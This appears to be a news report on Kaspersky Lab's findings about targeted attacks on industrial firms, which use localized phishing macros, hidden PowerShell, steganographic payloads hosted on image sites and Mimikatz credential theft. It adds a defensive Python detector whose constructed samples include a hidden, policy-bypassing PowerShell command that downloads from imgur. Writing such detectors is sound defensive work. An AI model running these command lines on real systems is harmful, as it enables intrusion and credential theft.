Attackers are using considerable skill and effort to penetrate industrial companies in multiple countries, with hacks that combine multiple evasive mechanisms, an innovative encryption scheme, and exploits customized for each target.
The attacks begin with emails that are customized for each target, a researcher at security firm Kaspersky Lab reported this week. For the exploit to be triggered, the language of the email must match the localization of the target's operating system. For example, an attack on a Japanese company required the text of the email and of an attached Microsoft Office document containing a malicious macro to be written in Japanese. Also required: the encrypted malware module could only be decrypted if the operating system had a Japanese localization as well.
Recipients who click on a request to urgently activate the document's active content see no indication that anything is wrong. Behind the scenes, however, the macro executes a PowerShell script. The reason it stays hidden lies in the command parameters:
- -ExecutionPolicy ByPass: overrides the organization's script execution policy
- -WindowStyle Hidden: hides the PowerShell window
- -NoProfile: runs the script without loading the end user's profile configuration
Anyone for triple-encoded steganography?
The PowerShell script reaches out to either imgur.com or imgbox.com and downloads an image in which malicious code is hidden in the pixels, a technique called steganography. The data is Base64 encoded, encrypted with an RSA key, and then Base64 encoded again. In a clever move, the script contains a deliberate error in its code. The error message it produces, which differs for each language pack installed on the operating system, is the decryption key.
The decoded and decrypted data is used as a second PowerShell script, which in turn unpacks and decrypts another blob of Base64-encoded data. A third, obfuscated PowerShell script runs the Mimikatz tool to steal Windows account credentials, which are then used to access various network resources. If the stolen credentials include those for the powerful Windows Active Directory, the attackers have access to virtually every node in the network.
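The combination of switches listed above, a download from an image-hosting service, and an Office parent process are all visible in ordinary process-creation telemetry (for example the fields of a Sysmon Event ID 1 record). The following detector is an added example written for this article, not code from Ars Technica or Kaspersky Lab. The sample events are constructed, and the scoring weights, the alert threshold and the set of Office parent images are assumptions; what it does show is that a detector has to accept the abbreviated parameter spellings powershell.exe itself accepts (-ep, -w, -nop, -enc), since matching only the full names is trivially evaded.

```python
import re
from dataclasses import dataclass, field


def prefix_pattern(name: str, min_len: int) -> str:
    """Regex for '-' followed by any prefix of `name` at least `min_len` long.
    powershell.exe accepts unambiguous prefixes of its parameter names
    (-ex, -exec, -ExecutionPolicy ...), so the detector must as well."""
    head, tail = name[:min_len], name[min_len:]
    nested = "".join(f"(?:{ch}" for ch in tail) + ")?" * len(tail)
    return rf"-{head}{nested}(?![a-z])"


FLAGS = re.IGNORECASE
# The three switches from the article; -ep and -ec are explicit short forms.
EXECUTION_POLICY_BYPASS = re.compile(
    rf"(?:{prefix_pattern('executionpolicy', 2)}|-ep(?![a-z]))\s+bypass\b", FLAGS)
WINDOW_HIDDEN = re.compile(rf"{prefix_pattern('windowstyle', 1)}\s+hidden\b", FLAGS)
NO_PROFILE = re.compile(prefix_pattern("noprofile", 3), FLAGS)
ENCODED_COMMAND = re.compile(
    rf"(?:{prefix_pattern('encodedcommand', 1)}|-ec(?![a-z]))\s+[a-z0-9+/=]{{8,}}", FLAGS)
# Image hosts the article names as the steganography carrier.
IMAGE_HOST_URL = re.compile(r"https?://(?:[a-z0-9-]+\.)*(?:imgur|imgbox)\.com/\S+", FLAGS)
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", FLAGS)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
ALERT_THRESHOLD = 4  # assumed; tune against your own baseline


@dataclass
class Finding:
    parent_image: str
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def assess_process(parent_image: str, command_line: str) -> Finding:
    """Score one process-creation event; only PowerShell launches are scored."""
    finding = Finding(parent_image.lower())
    if not POWERSHELL.search(command_line):
        return finding
    hits = 0
    for pattern, reason in ((EXECUTION_POLICY_BYPASS, "execution policy bypassed"),
                            (WINDOW_HIDDEN, "window hidden"),
                            (NO_PROFILE, "profile suppressed")):
        if pattern.search(command_line):
            hits += 1
            finding.score += 1
            finding.reasons.append(reason)
    if hits == 3:  # the exact trio the article describes
        finding.score += 2
        finding.reasons.append("all three evasion switches together")
    if ENCODED_COMMAND.search(command_line):
        finding.score += 1
        finding.reasons.append("encoded command")
    if IMAGE_HOST_URL.search(command_line):
        finding.score += 2
        finding.reasons.append("fetches from image-hosting service")
    if finding.parent_image in OFFICE_PARENTS:
        finding.score += 2
        finding.reasons.append("spawned by an Office application (macro)")
    return finding


# Constructed sample events: (parent image, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("winword.exe", r'powershell.exe -ExecutionPolicy ByPass -WindowStyle hidden -NoProfile '
                    r'-Command "$i=(New-Object Net.WebClient).DownloadData(\'https://imgur.com/PLACEHOLDER.png\')"'),
    ("explorer.exe", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ("excel.exe", r"powershell -ep bypass -w hidden -nop -enc SQBFAFgAIAAoAE4A"),
    ("cmd.exe", r"powershell.exe -Command Get-Process"),
    ("svchost.exe", r"C:\Windows\System32\notepad.exe readme.txt"),
]


def scan(events=SAMPLE_EVENTS):
    """Return the findings that cross the alert threshold."""
    return [f for f in (assess_process(p, c) for p, c in events) if f.alert]


if __name__ == "__main__":
    for f in scan():
        print(f.parent_image, f.score, "; ".join(f.reasons))
```

The benign backup script launched from Explorer with -NoProfile scores 1 and stays below the threshold, while both macro-style launches alert even though the second one uses only abbreviated switches.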
The following diagram summarizes the course of the attack:
The attacks Kaspersky Lab discovered in Japan, Italy, Germany and the UK stand out for their unconventional approaches, as the company's article this week notes. Company researcher Vyacheslav Kopeytsev wrote:
First, the malicious module is encoded into an image using steganographic techniques and the image is hosted on legitimate web resources. This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded. From a technical solutions perspective, this activity is indistinguishable from sending ordinary requests to legitimate image hosting services.
A second strange feature of the malware is the use of the exception message as a decryption key for the malicious payload. This technique can help the malware elude detection in sandbox-class automated analysis systems, and makes it significantly more difficult for researchers to analyze the functionality of the malware if they don't know which language pack was used on the victim's computer.
Using the above techniques in combination with the accuracy of the infections shows that they were targeted attacks. It is worrying that contractors from industrial companies are among the victims of the attacks. If the attackers are able to collect the credentials of a contractor organization's employees, this can have a number of negative consequences, from theft of sensitive data to attacks on industrial companies through remote management tools used by the contractor.
Kaspersky Lab software blocked the attacks before they could progress, so researchers still don't know what the attackers' ultimate goal was. In recent years, control systems for gas refineries, power plants, factories, and other critical infrastructure have increasingly been attacked by saboteurs and ransomware. The industrial-company customers of the contractors may have been the ultimate target of these attacks.